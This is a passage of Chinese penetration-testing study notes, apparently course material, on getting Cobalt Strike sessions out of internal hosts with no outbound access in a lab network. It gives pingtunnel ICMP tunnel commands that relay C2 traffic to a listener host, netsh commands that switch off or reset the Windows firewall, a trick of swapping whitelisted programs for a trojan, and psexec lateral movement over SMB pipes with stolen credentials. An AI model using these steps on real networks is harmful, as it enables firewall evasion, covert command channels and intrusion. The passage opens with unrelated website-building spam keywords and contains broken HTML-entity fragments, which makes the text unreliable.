套模板做网站 链接怎么做,长春建站网站,嵩县网站建设,网站建设方案书纯文字知识点
#知识点#xff1a;
1、入站规则不出网上线方案
2、出站规则不出网上线方案
3、规则-隧道技术-SMBICMP-隧道技术#xff1a;解决不出网协议上线的问题#xff08;利用出网协议进行封装出网#xff09;
-代理技术#xff1a;解决网络通讯不通的问题#xff0… 知识点
#知识点
1、入站规则不出网上线方案
2、出站规则不出网上线方案
3、规则-隧道技术-SMBICMP-隧道技术解决不出网协议上线的问题利用出网协议进行封装出网
-代理技术解决网络通讯不通的问题利用跳板机建立节点后续操作
-连接方向正向反向基础课程有讲过#系列点
1、判断什么时候用代理
2、判断什么时候用隧道
3、判断出网和不出网协议
4、如何使用代理建立节点并连接
5、如何使用隧道技术封装协议上线
6、判断哪些代理或隧道情况选择放弃演示案例
1、不出网-控制上线-CS-反向连接2、不出网-控制上线-CS-SMB隧道使用SMB隧道普通用户是不行的需要提权3、不出网-控制上线-CS-ICMP隧道4、不出网-控制上线-CS-关闭防火墙入站过滤上线
1、隧道技术正向硬刚
2、反向连接跳过
3、关闭删除替换
适用利用入站通行拿到的高权限出站过滤上线
1、隧道技术反向硬刚
2、正向连接跳过
3、关闭删除替换
适用利用入站通行拿到的高权限采用第三种方案防火墙开关删除规则替换程序
适用于
1、单纯的内网环境
2、单纯的内网域环境域控没有设置组策略防火墙同步隧道技术上线
HTTP/S DNS SSH ICMP SMB 协议穿透等
除去SMB隧道其他隧道技术大部分针对的出站策略绕过
ICMP
./pingtunnel -type server
肉鸡(管理器运行)
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.22.130 -t 192.168.22.130:3344 -tcp 1 -noprint 1 -nolog 1
CS:
监听器1127.0.0.1 3333
监听器2192.168.22.130 3344
生成监听器1的Stager后门肉鸡执行Windows防火墙命令
https://www.cnblogs.com/tomtellyou/p/16300557.html
查看当前防火墙状态netsh advfirewall show allprofiles
关闭防火墙netsh advfirewall set allprofiles state off
开启防火墙netsh advfirewall set allprofiles state on
恢复初始防火墙设置netsh advfirewall reset
启用桌面防火墙: netsh advfirewall set allprofiles state on
设置默认输入和输出策略netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound
如果设置为拒绝使用blockinbound,blockoutbound总结
拓扑图在前一次的基础上win2008做了入站限制只让访问Web服务win2012也做了入站限制只让访问打印机思路
win7还是有外网出口的正向tcp/反向tcp都能直接拿下拿下win7后生成正向tcp让win7主动连接拿下win10也可以反向但需要在win7的11网卡上设置监听器转发上线win10拿下win10后这时想再用正向tcp拿下win2008已经不行了因为win2008入站只让访问Web服务可以考虑以下几种方法
1.隧道技术正向硬刚可以用icmp隧道因为icmp是网络层协议web服务属于应用层
2.反向连接跳过在win10的22网卡上设置监听器转发上线win2008
3.关闭删除替换即使用命令关闭防火墙、删除策略、替换白名单策略所指向的exe指向木马但是有限制条件拿下win2008后使用tcp反向连接拿下win2012是不行的因为tcp反向连接的流量到win2008时属于入站而其做了入站限制。
同样正向tcp肯定也是不行的因为win2012限制了只能访问打印机。
现在的思路是隧道技术正向硬刚可以用SMB隧道打印机一般都开有445端口
需要在cs上创建smb的监听器即smb管道然后配合横向移动手段比如用cs在win2008上扫描33网段存活主机
扫到win2012后右键其选择横向移动 - psexec64 - 输入前期信息收集到的用户名密码 - 监听器选择smb的监听器 - 会话选择win2008的33网段
总的意思就是用win2008的会话进行smb的横向移动拿下win2012
